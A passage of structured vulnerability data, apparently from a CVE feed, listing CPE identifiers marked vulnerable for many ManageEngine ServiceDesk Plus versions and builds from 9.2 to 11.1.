"cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9242:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9300:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9301:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9302:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9303:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9304:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9305:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9306:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9307:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9308:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9309:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9310:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9311:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9312:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9313:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9314:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9315:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9316:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9317:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9318:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9319:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9320:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9321:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9322:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9323:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9324:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9325:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9326:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9327:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9328:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9329:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9330:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9331:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9332:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9333:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9334:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9335:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9336:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9400:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9401:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9402:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9403:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9404:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9405:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9406:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9407:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9408:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9409:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9410:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9411:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9412:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9413:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9414:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9415:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9416:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9417:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9418:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9419:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9420:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9421:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9422:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9423:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9424:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9425:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9426:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9427:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10000:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10001:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10002:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10003:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10004:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10005:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10006:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10007:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10008:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10009:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10010:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10011:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10012:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10013:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10014:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10015:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10016:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10017:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10018:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10019:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10020:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10021:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10500:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10501:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10502:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10503:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10504:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10505:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10506:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10507:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10508:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10509:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10510:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10511:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10512:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10513:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10514:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10515:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11000:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11001:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11002:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11003:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11004:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11005:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11006:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11007:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11008:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11009:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11010:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11011:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11012:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11100:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11101:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11102:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11103:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11104:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11105:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11106:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11107:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11108:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11109:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11110:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11111:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11112:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11113:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11114:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11115:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11116:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11117:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11118:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11119:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11120:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11121:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11122:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11123:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11124:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11125:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11126:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11127:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11128:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11129:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11130:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11131:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11132:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11133:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11134:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11135:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11136:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11137:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11139:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11140:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11141:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11142:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11143:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11144:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11145:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11146:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11147:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11118:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11119:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11120:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11121:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11122:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11123:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11124:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11125:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11126:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11127:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11128:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11129:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11130:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11131:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11132:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11133:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11134:*:*:*:*:*:*", "cpe_name": []}, 